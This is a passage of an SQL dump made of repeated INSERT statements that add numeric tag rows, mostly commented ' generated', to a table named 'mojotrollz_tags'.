VALUES (7657, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7658, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7659, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7660, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7661, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7662, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7663, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7664, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7665, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7666, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7667, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7671, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7672, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7673, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7674, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7675, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7676, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7677, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7678, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7703, 4, 1, 429, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7703, 4, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7721, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7722, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7723, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7724, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7725, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7726, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7727, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7730, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7731, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7732, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7733, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7734, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7736, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7737, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7782, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7784, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7786, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7788, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7789, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7791, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7793, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7794, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7795, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7796, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7799, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7800, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7801, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7802, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7803, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7804, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7805, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7806, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7807, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7808, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7809, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7811, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7812, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7813, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7814, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7815, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7816, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7817, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7818, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7819, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7820, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7821, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7822, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7823, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7824, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7825, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7826, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7827, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7828, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7829, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7830, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7831, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7832, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7833, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7834, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7835, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7836, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7837, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7838, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7839, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7840, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7841, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7842, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7843, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7844, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7845, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7846, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7847, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7848, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7849, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7850, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7863, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7864, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7865, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7866, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7867, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7868, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7871, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7872, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7873, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7874, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7875, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7876, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7877, 4, 1, 429, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7877, 4, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7881, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7882, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7883, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7884, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7885, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7886, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7887, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7888, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7889, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7890, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7891, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7892, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7893, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7894, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7895, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7896, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7897, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7898, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7899, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7900, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7901, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7902, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7903, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7921, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7922, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7923, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7924, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7925, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7926, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7930, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7931, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7932, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7933, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7934, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7935, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7936, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7939, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7940, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7941, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7942, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7943, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7946, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7981, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8041, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8042, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8043, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8044, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8045, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8046, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8047, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8048, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8049, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8050, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8051, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8052, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8053, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8054, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8055, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8056, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8057, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8058, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8059, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8060, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8061, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8062, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8063, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8064, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8065, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8066, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8067, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8068, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8069, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8070, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8071, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8072, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8073, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8074, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8075, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8076, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8077, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8078, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8079, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8080, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8081, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8101, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8102, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8103, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8104, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8105, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8106, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8107, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8108, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8109, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8110, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8111, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8112, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8113, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8114, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8115, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8116, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8117, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8118, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8119, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8120, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8121, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8122, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8123, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8124, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8141, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8142, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8143, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8144, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8145, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8146, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8147, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8148, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8149, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8150, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8151, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8153, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8154, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8155, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8156, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8157, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8158, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8159, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8160, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8161, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES 